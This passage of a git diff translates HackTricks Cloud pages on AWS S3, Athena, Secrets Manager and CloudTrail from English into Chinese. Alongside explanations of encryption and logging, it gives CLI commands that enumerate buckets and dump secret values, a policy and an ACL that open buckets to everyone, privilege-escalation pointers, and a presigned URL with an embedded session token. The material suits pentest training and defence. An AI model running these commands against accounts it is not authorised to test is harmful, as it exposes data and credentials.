这些选项中的任何一个来实现数据保护。**数据复制** 是 AWS 的一项内部功能,**S3 会自动在所有可用区复制每个对象**,在这种情况下,组织无需启用它。 -With resource-based permissions, you can define permissions for sub-directories of your bucket separately. +通过基于资源的权限,您可以单独为存储桶的子目录定义权限。 -### Bucket Versioning and MFA based delete +### 桶版本控制和基于 MFA 的删除 -When bucket versioning is enabled, any action that tries to alter a file inside a file will generate a new version of the file, keeping also the previous content of the same. Therefore, it won't overwrite its content. +当启用桶版本控制时,任何试图更改文件的操作都会生成该文件的新版本,同时保留相同文件的先前内容。因此,它不会覆盖其内容。 -Moreover, MFA based delete will prevent versions of file in the S3 bucket from being deleted and also Bucket Versioning from being disabled, so an attacker won't be able to alter these files. +此外,基于 MFA 的删除将防止 S3 存储桶中的文件版本被删除,也将防止桶版本控制被禁用,因此攻击者将无法更改这些文件。 -### S3 Access logs +### S3 访问日志 -It's possible to **enable S3 access login** (which by default is disabled) to some bucket and save the logs in a different bucket to know who is accessing the bucket (both buckets must be in the same region). +可以 **启用 S3 访问登录**(默认情况下是禁用的)到某个存储桶,并将日志保存在另一个存储桶中,以了解谁在访问该存储桶(两个存储桶必须在同一区域内)。 -### S3 Presigned URLs - -It's possible to generate a presigned URL that can usually be used to **access the specified file** in the bucket. 
A **presigned URL looks like this**: +### S3 预签名 URL +可以生成一个预签名 URL,通常用于 **访问存储桶中的指定文件**。一个 **预签名 URL 看起来像这样**: ``` https://.s3.us-east-1.amazonaws.com/asd.txt?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAUUE8GZC4S5L3TY3P%2F20230227%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230227T142551Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjELf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIBhQpdETJO3HKKDk2hjNIrPWwBE8gZaQccZFV3kCpPCWAiEAid3ueDtFFU%2FOQfUpvxYTGO%2BHoS4SWDMUrQAE0pIaB40qggMIYBAAGgwzMTgxNDIxMzg1NTMiDJLI5t7gr2EGxG1Y5CrfAioW0foHIQ074y4gvk0c%2B%2Fmqc7cNWb1njQslQkeePHkseJ3owzc%2FCwkgE0EuZTd4mw0aJciA2XIbJRCLPWTb%2FCBKPnIMJ5aBzIiA2ltsiUNQTTUxYmEgXZoJ6rFYgcodnmWW0Et4Xw59UlHnCDB2bLImxPprriyCzDDCD6nLyp3J8pFF1S8h3ZTJE7XguA8joMs4%2B2B1%2FeOZfuxXKyXPYSKQOOSbQiHUQc%2BFnOfwxleRL16prWk1t7TamvHR%2Bt3UgMn5QWzB3p8FgWwpJ6GjHLkYMJZ379tkimL1tJ7o%2BIod%2FMYrS7LDCifP9d%2FuYOhKWGhaakPuJKJh9fl%2B0vGl7kmApXigROxEWon6ms75laXebltsWwKcKuYca%2BUWu4jVJx%2BWUfI4ofoaGiCSaKALTqwu4QNBRT%2BMoK6h%2BQa7gN7JFGg322lkxRY53x27WMbUE4unn5EmI54T4dWt1%2Bg8ljDS%2BvKfBjqmAWRwuqyfwXa5YC3xxttOr3YVvR6%2BaXpzWtvNJQNnb6v0uI3%2BTtTexZkJpLQYqFcgZLQSxsXWSnf988qvASCIUhAzp2UnS1uqy7QjtD5T73zksYN2aesll7rvB80qIuujG6NOdHnRJ2M5%2FKXXNo1Yd15MtzPuSjRoSB9RSMon5jFu31OrQnA9eCUoawxbB0nHqwK8a43CKBZHhA8RoUAJW%2B48EuFsp3U%3D&X-Amz-Signature=3436e4139e84dbcf5e2e6086c0ebc92f4e1e9332b6fda24697bc339acbf2cdfa ``` - -A presigned URL can be **created from the cli using credentials of a principal with access to the object** (if the account you use doesn't have access, a shorter presigned URL will be created but it will be useless) - +一个预签名的 URL 可以**使用具有访问对象权限的主体的凭证从 CLI 创建**(如果您使用的帐户没有访问权限,将创建一个较短的预签名 URL,但它将无用) ```bash - aws s3 presign --region 's3:///' +aws s3 presign --region 's3:///' ``` - > [!NOTE] -> The only required permission to generate a presigned URL is the permission being given, so for the previous command the only permission needed by the principal is `s3:GetObject` - -It's also possible to create presigned URLs with **other permissions**: +> 生成预签名 URL 所需的唯一权限是所授予的权限,因此对于之前的命令,主体所需的唯一权限是 `s3:GetObject` +也可以使用 **其他权限** 创建预签名 URL: ```python import boto3 url = boto3.client('s3').generate_presigned_url( - ClientMethod='put_object', - Params={'Bucket': 'BUCKET_NAME', 'Key': 'OBJECT_KEY'}, - ExpiresIn=3600 +ClientMethod='put_object', +Params={'Bucket': 'BUCKET_NAME', 'Key': 'OBJECT_KEY'}, +ExpiresIn=3600 ) ``` +### S3 加密机制 -### S3 Encryption Mechanisms - -**DEK means Data Encryption Key** and is the key that is always generated and used to encrypt data. +**DEK 意味着数据加密密钥**,是始终生成并用于加密数据的密钥。
-Server-side encryption with S3 managed keys, SSE-S3 +使用 S3 管理密钥的服务器端加密,SSE-S3 -This option requires minimal configuration and all management of encryption keys used are managed by AWS. All you need to do is to **upload your data and S3 will handle all other aspects**. Each bucket in a S3 account is assigned a bucket key. +此选项需要最少的配置,所有使用的加密密钥管理均由 AWS 管理。您只需 **上传您的数据,S3 将处理所有其他方面**。每个 S3 账户中的存储桶都分配一个存储桶密钥。 -- Encryption: - - Object Data + created plaintext DEK --> Encrypted data (stored inside S3) - - Created plaintext DEK + S3 Master Key --> Encrypted DEK (stored inside S3) and plain text is deleted from memory -- Decryption: - - Encrypted DEK + S3 Master Key --> Plaintext DEK - - Plaintext DEK + Encrypted data --> Object Data +- 加密: +- 对象数据 + 创建的明文 DEK --> 加密数据(存储在 S3 中) +- 创建的明文 DEK + S3 主密钥 --> 加密 DEK(存储在 S3 中),明文从内存中删除 +- 解密: +- 加密 DEK + S3 主密钥 --> 明文 DEK +- 明文 DEK + 加密数据 --> 对象数据 -Please, note that in this case **the key is managed by AWS** (rotation only every 3 years). If you use your own key you willbe able to rotate, disable and apply access control. +请注意,在这种情况下 **密钥由 AWS 管理**(每 3 年轮换一次)。如果您使用自己的密钥,您将能够轮换、禁用并应用访问控制。
-Server-side encryption with KMS managed keys, SSE-KMS +使用 KMS 管理密钥的服务器端加密,SSE-KMS -This method allows S3 to use the key management service to generate your data encryption keys. KMS gives you a far greater flexibility of how your keys are managed. For example, you are able to disable, rotate, and apply access controls to the CMK, and order to against their usage using AWS Cloud Trail. +此方法允许 S3 使用密钥管理服务生成您的数据加密密钥。KMS 为您提供了更大的密钥管理灵活性。例如,您可以禁用、轮换并对 CMK 应用访问控制,并使用 AWS Cloud Trail 监控其使用情况。 -- Encryption: - - S3 request data keys from KMS CMK - - KMS uses a CMK to generate the pair DEK plaintext and DEK encrypted and send them to S£ - - S3 uses the paintext key to encrypt the data, store the encrypted data and the encrypted key and deletes from memory the plain text key -- Decryption: - - S3 ask to KMS to decrypt the encrypted data key of the object - - KMS decrypt the data key with the CMK and send it back to S3 - - S3 decrypts the object data +- 加密: +- S3 向 KMS CMK 请求数据密钥 +- KMS 使用 CMK 生成明文 DEK 和加密 DEK 对,并将其发送到 S3 +- S3 使用明文密钥加密数据,存储加密数据和加密密钥,并从内存中删除明文密钥 +- 解密: +- S3 请求 KMS 解密对象的加密数据密钥 +- KMS 使用 CMK 解密数据密钥并将其发送回 S3 +- S3 解密对象数据
-Server-side encryption with customer provided keys, SSE-C +使用客户提供密钥的服务器端加密,SSE-C -This option gives you the opportunity to provide your own master key that you may already be using outside of AWS. Your customer-provided key would then be sent with your data to S3, where S3 would then perform the encryption for you. +此选项使您能够提供您可能已经在 AWS 之外使用的主密钥。您的客户提供的密钥将与您的数据一起发送到 S3,S3 将为您执行加密。 -- Encryption: - - The user sends the object data + Customer key to S3 - - The customer key is used to encrypt the data and the encrypted data is stored - - a salted HMAC value of the customer key is stored also for future key validation - - the customer key is deleted from memory -- Decryption: - - The user send the customer key - - The key is validated against the HMAC value stored - - The customer provided key is then used to decrypt the data +- 加密: +- 用户将对象数据 + 客户密钥发送到 S3 +- 客户密钥用于加密数据,且加密数据被存储 +- 客户密钥的盐值 HMAC 值也被存储以供将来密钥验证 +- 客户密钥从内存中删除 +- 解密: +- 用户发送客户密钥 +- 密钥与存储的 HMAC 值进行验证 +- 然后使用客户提供的密钥解密数据
-Client-side encryption with KMS, CSE-KMS +使用 KMS 的客户端加密,CSE-KMS -Similarly to SSE-KMS, this also uses the key management service to generate your data encryption keys. However, this time KMS is called upon via the client not S3. The encryption then takes place client-side and the encrypted data is then sent to S3 to be stored. +与 SSE-KMS 类似,这也使用密钥管理服务生成您的数据加密密钥。然而,这次是通过客户端而不是 S3 调用 KMS。加密在客户端进行,随后将加密数据发送到 S3 存储。 -- Encryption: - - Client request for a data key to KMS - - KMS returns the plaintext DEK and the encrypted DEK with the CMK - - Both keys are sent back - - The client then encrypts the data with the plaintext DEK and send to S3 the encrypted data + the encrypted DEK (which is saved as metadata of the encrypted data inside S3) -- Decryption: - - The encrypted data with the encrypted DEK is sent to the client - - The client asks KMS to decrypt the encrypted key using the CMK and KMS sends back the plaintext DEK - - The client can now decrypt the encrypted data +- 加密: +- 客户端请求 KMS 的数据密钥 +- KMS 返回明文 DEK 和与 CMK 的加密 DEK +- 两个密钥都被发送回 +- 客户端使用明文 DEK 加密数据,并将加密数据 + 加密 DEK(作为加密数据的元数据存储在 S3 中)发送到 S3 +- 解密: +- 带有加密 DEK 的加密数据发送到客户端 +- 客户端请求 KMS 使用 CMK 解密加密密钥,KMS 返回明文 DEK +- 客户端现在可以解密加密数据
-Client-side encryption with customer provided keys, CSE-C +使用客户提供密钥的客户端加密,CSE-C -Using this mechanism, you are able to utilize your own provided keys and use an AWS-SDK client to encrypt your data before sending it to S3 for storage. +使用此机制,您可以利用自己提供的密钥,并使用 AWS-SDK 客户端在将数据发送到 S3 存储之前对其进行加密。 -- Encryption: - - The client generates a DEK and encrypts the plaintext data - - Then, using it's own custom CMK it encrypts the DEK - - submit the encrypted data + encrypted DEK to S3 where it's stored -- Decryption: - - S3 sends the encrypted data and DEK - - As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data +- 加密: +- 客户端生成 DEK 并加密明文数据 +- 然后,使用其自定义 CMK 加密 DEK +- 提交加密数据 + 加密 DEK 到 S3 进行存储 +- 解密: +- S3 发送加密数据和 DEK +- 由于客户端已经拥有用于加密 DEK 的 CMK,因此它解密 DEK,然后使用明文 DEK 解密数据
-### **Enumeration** - -One of the traditional main ways of compromising AWS orgs start by compromising buckets publicly accesible. **You can find** [**public buckets enumerators in this page**](../aws-unauthenticated-enum-access/#s3-buckets)**.** +### **枚举** +妥协 AWS 组织的传统主要方式之一是从妥协公开可访问的存储桶开始。 **您可以在此页面找到** [**公共存储桶枚举工具**](../aws-unauthenticated-enum-access/#s3-buckets)**.** ```bash # Get buckets ACLs aws s3api get-bucket-acl --bucket @@ -184,28 +177,28 @@ aws s3api list-objects --bucket BUCKETNAME --output json --query "[sum(Contents[ aws s3api put-bucket-policy --policy file:///root/policy.json --bucket ##JSON policy example { - "Id": "Policy1568185116930", - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "Stmt1568184932403", - "Action": [ - "s3:ListBucket" - ], - "Effect": "Allow", - "Resource": "arn:aws:s3:::welcome", - "Principal": "*" - }, - { - "Sid": "Stmt1568185007451", - "Action": [ - "s3:GetObject" - ], - "Effect": "Allow", - "Resource": "arn:aws:s3:::welcome/*", - "Principal": "*" - } - ] +"Id": "Policy1568185116930", +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "Stmt1568184932403", +"Action": [ +"s3:ListBucket" +], +"Effect": "Allow", +"Resource": "arn:aws:s3:::welcome", +"Principal": "*" +}, +{ +"Sid": "Stmt1568185007451", +"Action": [ +"s3:GetObject" +], +"Effect": "Allow", +"Resource": "arn:aws:s3:::welcome/*", +"Principal": "*" +} +] } # Update bucket ACL @@ -218,35 +211,34 @@ aws s3api put-object-acl --bucket --key flag --access-control-poli ##JSON ACL example ## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved. { - "Owner": { - "DisplayName": "", - "ID": "" - }, - "Grants": [ - { - "Grantee": { - "Type": "Group", - "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" - }, - "Permission": "FULL_CONTROL" - } - ] +"Owner": { +"DisplayName": "", +"ID": "" +}, +"Grants": [ +{ +"Grantee": { +"Type": "Group", +"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" +}, +"Permission": "FULL_CONTROL" +} +] } ## An ACL should give you the permission WRITE_ACP to be able to put a new ACL ``` - ### dual-stack -You can access an S3 bucket through a dual-stack endpoint by using a virtual hosted-style or a path-style endpoint name. These are useful to access S3 through IPv6. +您可以通过双栈端点使用虚拟托管样式或路径样式端点名称访问 S3 存储桶。这些对于通过 IPv6 访问 S3 很有用。 -Dual-stack endpoints use the following syntax: +双栈端点使用以下语法: - `bucketname.s3.dualstack.aws-region.amazonaws.com` - `s3.dualstack.aws-region.amazonaws.com/bucketname` ### Privesc -In the following page you can check how to **abuse S3 permissions to escalate privileges**: +在以下页面中,您可以查看如何 **滥用 S3 权限以提升权限**: {{#ref}} ../aws-privilege-escalation/aws-s3-privesc.md @@ -274,22 +266,21 @@ In the following page you can check how to **abuse S3 permissions to escalate pr ### S3 HTTP Cache Poisoning Issue -[**According to this research**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies#heading-s3-http-desync-cache-poisoning-issue) it was possible to cache the response of an arbitrary bucket as if it belonged to a different one. This could have been abused to change for example javascript file responses and compromise arbitrary pages using S3 to store static code. 
+[**根据这项研究**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies#heading-s3-http-desync-cache-poisoning-issue),可以将任意存储桶的响应缓存为属于不同的存储桶。这可能被滥用来更改例如 JavaScript 文件的响应,并利用 S3 存储静态代码来妥协任意页面。 ## Amazon Athena -Amazon Athena is an interactive query service that makes it easy to **analyze data** directly in Amazon Simple Storage Service (Amazon **S3**) **using** standard **SQL**. +Amazon Athena 是一种交互式查询服务,使您能够直接在 Amazon Simple Storage Service (Amazon **S3**) 中 **分析数据**,使用标准 **SQL**。 -You need to **prepare a relational DB table** with the format of the content that is going to appear in the monitored S3 buckets. And then, Amazon Athena will be able to populate the DB from the logs, so you can query it. +您需要 **准备一个关系型数据库表**,其格式与将出现在监控的 S3 存储桶中的内容相符。然后,Amazon Athena 将能够从日志中填充数据库,以便您可以查询它。 -Amazon Athena supports the **ability to query S3 data that is already encrypted** and if configured to do so, **Athena can also encrypt the results of the query which can then be stored in S3**. +Amazon Athena 支持 **查询已经加密的 S3 数据**,如果配置为这样,**Athena 还可以加密查询结果,然后将其存储在 S3 中**。 -**This encryption of results is independent of the underlying queried S3 data**, meaning that even if the S3 data is not encrypted, the queried results can be encrypted. A couple of points to be aware of is that Amazon Athena only supports data that has been **encrypted** with the **following S3 encryption methods**, **SSE-S3, SSE-KMS, and CSE-KMS**. +**结果的加密与被查询的 S3 数据是独立的**,这意味着即使 S3 数据未加密,被查询的结果也可以加密。需要注意的是,Amazon Athena 仅支持使用 **以下 S3 加密方法** **加密** 的数据,**SSE-S3、SSE-KMS 和 CSE-KMS**。 -SSE-C and CSE-E are not supported. In addition to this, it's important to understand that Amazon Athena will only run queries against **encrypted objects that are in the same region as the query itself**. If you need to query S3 data that's been encrypted using KMS, then specific permissions are required by the Athena user to enable them to perform the query. +SSE-C 和 CSE-E 不受支持。此外,重要的是要理解,Amazon Athena 仅会对 **与查询本身在同一区域的加密对象** 运行查询。如果您需要查询使用 KMS 加密的 S3 数据,则 Athena 用户需要特定权限以使其能够执行查询。 ### Enumeration - ```bash # Get catalogs aws athena list-data-catalogs @@ -311,14 +302,9 @@ aws athena get-prepared-statement --statement-name --work-group # Run query aws athena start-query-execution --query-string ``` - -## References +## 参考文献 - [https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3](https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3) - [https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md index a50eaa24f..a4adfd3df 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md @@ -4,22 +4,21 @@ ## AWS Secrets Manager -AWS Secrets Manager is designed to **eliminate the use of hard-coded secrets in applications by replacing them with an API call**. This service serves as a **centralized repository for all your secrets**, ensuring they are managed uniformly across all applications. 
+AWS Secrets Manager旨在**消除应用程序中硬编码秘密的使用,通过API调用替换它们**。该服务作为**所有秘密的集中存储库**,确保它们在所有应用程序中统一管理。 -The manager simplifies the **process of rotating secrets**, significantly improving the security posture of sensitive data like database credentials. Additionally, secrets like API keys can be automatically rotated with the integration of lambda functions. +该管理器简化了**旋转秘密的过程**,显著提高了敏感数据(如数据库凭证)的安全态势。此外,像API密钥这样的秘密可以通过集成lambda函数自动旋转。 -The access to secrets is tightly controlled through detailed IAM identity-based policies and resource-based policies. +对秘密的访问通过详细的IAM基于身份的策略和基于资源的策略严格控制。 -For granting access to secrets to a user from a different AWS account, it's necessary to: +要授予来自不同AWS账户的用户访问秘密的权限,必须: -1. Authorize the user to access the secret. -2. Grant permission to the user to decrypt the secret using KMS. -3. Modify the Key policy to allow the external user to utilize it. +1. 授权用户访问秘密。 +2. 授予用户使用KMS解密秘密的权限。 +3. 修改密钥策略以允许外部用户使用它。 -**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.** +**AWS Secrets Manager与AWS KMS集成,以在AWS Secrets Manager中加密您的秘密。** ### **Enumeration** - ```bash aws secretsmanager list-secrets #Get metadata of all secrets aws secretsmanager list-secret-version-ids --secret-id # Get versions @@ -28,7 +27,6 @@ aws secretsmanager get-secret-value --secret-id # Get value aws secretsmanager get-secret-value --secret-id --version-id # Get value of a different version aws secretsmanager get-resource-policy --secret-id --secret-id ``` - ### Privesc {{#ref}} @@ -48,7 +46,3 @@ aws secretsmanager get-resource-policy --secret-id --secret-id {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md index 8348ff098..48c3a5b4f 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md @@ -1,6 +1 @@ -# AWS - Security & Detection Services - - - - - +# AWS - 安全与检测服务 diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md index 780f52f6e..e82dd3fd6 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md @@ -4,111 +4,108 @@ ## **CloudTrail** -AWS CloudTrail **records and monitors activity within your AWS environment**. It captures detailed **event logs**, including who did what, when, and from where, for all interactions with AWS resources. This provides an audit trail of changes and actions, aiding in security analysis, compliance auditing, and resource change tracking. CloudTrail is essential for understanding user and resource behavior, enhancing security postures, and ensuring regulatory compliance. 
+AWS CloudTrail **记录和监控您 AWS 环境中的活动**。它捕获详细的 **事件日志**,包括谁在何时、从何处进行了什么操作,针对所有与 AWS 资源的交互。这提供了更改和操作的审计跟踪,有助于安全分析、合规审计和资源更改跟踪。CloudTrail 对于理解用户和资源行为、增强安全态势以及确保合规性至关重要。 -Each logged event contains: +每个记录的事件包含: -- The name of the called API: `eventName` -- The called service: `eventSource` -- The time: `eventTime` -- The IP address: `SourceIPAddress` -- The agent method: `userAgent`. Examples: - - Signing.amazonaws.com - From AWS Management Console - - console.amazonaws.com - Root user of the account - - lambda.amazonaws.com - AWS Lambda -- The request parameters: `requestParameters` -- The response elements: `responseElements` +- 被调用的 API 名称: `eventName` +- 被调用的服务: `eventSource` +- 时间: `eventTime` +- IP 地址: `SourceIPAddress` +- 代理方法: `userAgent`。示例: +- Signing.amazonaws.com - 来自 AWS 管理控制台 +- console.amazonaws.com - 账户的根用户 +- lambda.amazonaws.com - AWS Lambda +- 请求参数: `requestParameters` +- 响应元素: `responseElements` -Event's are written to a new log file **approximately each 5 minutes in a JSON file**, they are held by CloudTrail and finally, log files are **delivered to S3 approximately 15mins after**.\ -CloudTrails logs can be **aggregated across accounts and across regions.**\ -CloudTrail allows to use **log file integrity in order to be able to verify that your log files have remained unchanged** since CloudTrail delivered them to you. It creates a SHA-256 hash of the logs inside a digest file. A sha-256 hash of the new logs is created every hour.\ -When creating a Trail the event selectors will allow you to indicate the trail to log: Management, data or insights events. +事件每 **大约 5 分钟写入一个新的日志文件,格式为 JSON**,它们由 CloudTrail 保存,最后,日志文件 **大约在 15 分钟后交付到 S3**。\ +CloudTrail 的日志可以 **跨账户和跨区域聚合。**\ +CloudTrail 允许使用 **日志文件完整性,以便能够验证您的日志文件自 CloudTrail 交付给您以来是否保持不变**。它在摘要文件中创建日志的 SHA-256 哈希。每小时创建新日志的 SHA-256 哈希。\ +创建 Trail 时,事件选择器将允许您指示要记录的 Trail:管理、数据或洞察事件。 -Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S3) so AWS will decrypt the content for the people that has access to it, but for additional security you can use SSE with KMS and your own keys. 
+日志保存在 S3 存储桶中。默认情况下使用服务器端加密(SSE-S3),因此 AWS 将为有权访问的人解密内容,但为了额外的安全性,您可以使用 SSE 和 KMS 及您自己的密钥。 -The logs are stored in a **S3 bucket with this name format**: +日志存储在 **具有此名称格式的 S3 存储桶中**: - **`BucketName/AWSLogs/AccountID/CloudTrail/RegionName/YYY/MM/DD`** -- Being the BucketName: **`aws-cloudtrail-logs--`** -- Example: **`aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/`** +- 存储桶名称为: **`aws-cloudtrail-logs--`** +- 示例: **`aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/`** -Inside each folder each log will have a **name following this format**: **`AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz`** +在每个文件夹中,每个日志将具有 **遵循此格式的名称**: **`AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz`** -Log File Naming Convention +日志文件命名约定 ![](<../../../../images/image (122).png>) -Moreover, **digest files (to check file integrity)** will be inside the **same bucket** in: +此外,**摘要文件(用于检查文件完整性)**将位于 **同一存储桶**中: ![](<../../../../images/image (195).png>) -### Aggregate Logs from Multiple Accounts +### 从多个账户聚合日志 -- Create a Trial in the AWS account where you want the log files to be delivered to -- Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access -- Create a new Trail in the other AWS accounts and select to use the created bucket in step 1 +- 在您希望日志文件交付到的 AWS 账户中创建一个 Trail +- 对目标 S3 存储桶应用权限,允许 CloudTrail 的跨账户访问,并允许每个需要访问的 AWS 账户 +- 在其他 AWS 账户中创建一个新 Trail,并选择使用步骤 1 中创建的存储桶 -However, even if you can save al the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into a CloudWatch Logs belonging to a single AWS account. +然而,即使您可以将所有日志保存在同一个 S3 存储桶中,您也无法将来自多个账户的 CloudTrail 日志聚合到属于单个 AWS 账户的 CloudWatch Logs 中。 > [!CAUTION] -> Remember that an account can have **different Trails** from CloudTrail **enabled** storing the same (or different) logs in different buckets. +> 请记住,一个账户可以有 **不同的 Trails** 从 CloudTrail **启用**,在不同的存储桶中存储相同(或不同)的日志。 -### Cloudtrail from all org accounts into 1 +### 从所有组织账户到 1 个 CloudTrail -When creating a CloudTrail, it's possible to indicate to get activate cloudtrail for all the accounts in the org and get the logs into just 1 bucket: +创建 CloudTrail 时,可以指示为组织中的所有账户激活 CloudTrail,并将日志集中到一个存储桶中:
-This way you can easily configure CloudTrail in all the regions of all the accounts and centralize the logs in 1 account (that you should protect).
+这样,您可以轻松地在所有账户的所有区域配置 CloudTrail,并将日志集中到一个账户中(您应该保护好该账户)。

-### Log Files Checking
-
-You can check that the logs haven't been altered by running
+### 日志文件检查
+您可以运行以下命令来验证日志文件是否未被篡改:
```bash
aws cloudtrail validate-logs --trail-arn --start-time [--end-time ] [--s3-bucket ] [--s3-prefix ] [--verbose]
```
+### 日志到 CloudWatch

-### Logs to CloudWatch

-**CloudTrail can automatically send logs to CloudWatch so you can set alerts that warns you when suspicious activities are performed.**\
-Note that in order to allow CloudTrail to send the logs to CloudWatch a **role** needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to:
+**CloudTrail 可以自动将日志发送到 CloudWatch,以便您设置警报,在出现可疑活动时收到提醒。**\
+请注意,为了允许 CloudTrail 将日志发送到 CloudWatch,需要创建一个允许该操作的 **角色**。如果可能,建议使用 AWS 默认角色来执行这些操作。此角色将允许 CloudTrail:

+- CreateLogStream: 允许创建 CloudWatch Logs 日志流
+- PutLogEvents: 将 CloudTrail 日志传送到 CloudWatch Logs 日志流

-- CreateLogStream: This allows to create a CloudWatch Logs log streams
-- PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream

+### 事件历史

-### Event History
-
-CloudTrail Event History allows you to inspect in a table the logs that have been recorded:
+CloudTrail 事件历史允许您在表格中查看已记录的日志:

![](<../../../../images/image (89).png>)

-### Insights
+### Insights(洞察)

-**CloudTrail Insights** automatically **analyzes** write management events from CloudTrail trails and **alerts** you to **unusual activity**. For example, if there is an increase in `TerminateInstance` events that differs from established baselines, you’ll see it as an Insight event. These events make **finding and responding to unusual API activity easier** than ever.
+**CloudTrail Insights** 会自动 **分析** CloudTrail Trail 中的写入类管理事件,并在出现 **异常活动** 时 **向您发出警报**。例如,如果 `TerminateInstance` 事件的数量增加且偏离既定基线,您会看到一个 Insights 事件。这些事件使 **发现和响应异常 API 活动** 比以往更容易。

-The insights are stored in the same bucket as the CloudTrail logs in: `BucketName/AWSLogs/AccountID/CloudTrail-Insight`
+Insights 存储在与 CloudTrail 日志相同的存储桶中:`BucketName/AWSLogs/AccountID/CloudTrail-Insight`

-### Security
+### 安全

-| CloudTrail Log File Integrity |<br>
  • Validate if logs have been tampered with (modified or deleted)
  • Uses digest files (create hash for each file)

    • SHA-256 hashing
    • SHA-256 with RSA for digital signing
    • private key owned by Amazon
  • Takes 1 hour to create a digest file (done on the hour every hour)
| +| CloudTrail 日志文件完整性 |
  • 验证日志是否被篡改(修改或删除)
  • 使用摘要文件(为每个文件创建哈希)

    • SHA-256 哈希
    • 使用 RSA 进行数字签名的 SHA-256
    • 由 Amazon 拥有的私钥
  • 创建摘要文件需要 1 小时(每小时整点完成)
| | ------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | -| Stop unauthorized access |
  • Use IAM policies and S3 bucket policies

    • security team —> admin access
    • auditors —> read only access
  • Use SSE-S3/SSE-KMS to encrypt the logs
| -| Prevent log files from being deleted |
  • Restrict delete access with IAM and bucket policies
  • Configure S3 MFA delete
  • Validate with Log File Validation
| +| 防止未经授权的访问 |
  • 使用 IAM 策略和 S3 存储桶策略

    • 安全团队 —> 管理员访问
    • 审计员 —> 只读访问
  • 使用 SSE-S3/SSE-KMS 加密日志
| +| 防止日志文件被删除 |
  • 使用 IAM 和存储桶策略限制删除访问
  • 配置 S3 MFA 删除
  • 使用日志文件验证进行验证
| -## Access Advisor +## 访问顾问 -AWS Access Advisor relies on last 400 days AWS **CloudTrail logs to gather its insights**. CloudTrail captures a history of AWS API calls and related events made in an AWS account. Access Advisor utilizes this data to **show when services were last accessed**. By analyzing CloudTrail logs, Access Advisor can determine which AWS services an IAM user or role has accessed and when that access occurred. This helps AWS administrators make informed decisions about **refining permissions**, as they can identify services that haven't been accessed for extended periods and potentially reduce overly broad permissions based on real usage patterns. +AWS 访问顾问依赖于过去 400 天的 AWS **CloudTrail 日志来收集其洞察**。CloudTrail 捕获在 AWS 账户中进行的 AWS API 调用和相关事件的历史记录。访问顾问利用这些数据 **显示服务最后一次访问的时间**。通过分析 CloudTrail 日志,访问顾问可以确定 IAM 用户或角色访问了哪些 AWS 服务以及何时发生该访问。这帮助 AWS 管理员做出有关 **精炼权限** 的明智决策,因为他们可以识别长时间未被访问的服务,并可能根据实际使用模式减少过于宽泛的权限。 > [!TIP] -> Therefore, Access Advisor informs about **the unnecessary permissions being given to users** so the admin could remove them +> 因此,访问顾问告知 **给予用户的不必要权限**,以便管理员可以删除它们
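如果想以命令行方式查看 Access Advisor 的数据,可以使用 IAM 的“服务最后访问”API;下面是一个简单示例,其中的角色 ARN 和 JobId 仅为假设的占位符:

```bash
# 为指定的 IAM 用户/角色生成“服务最后访问”报告(异步作业,返回 JobId)
aws iam generate-service-last-accessed-details \
  --arn arn:aws:iam::123456789012:role/ExampleRole

# 使用上一步返回的 JobId 获取结果,查看每个服务的最后访问时间
aws iam get-service-last-accessed-details --job-id <JobId>
```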
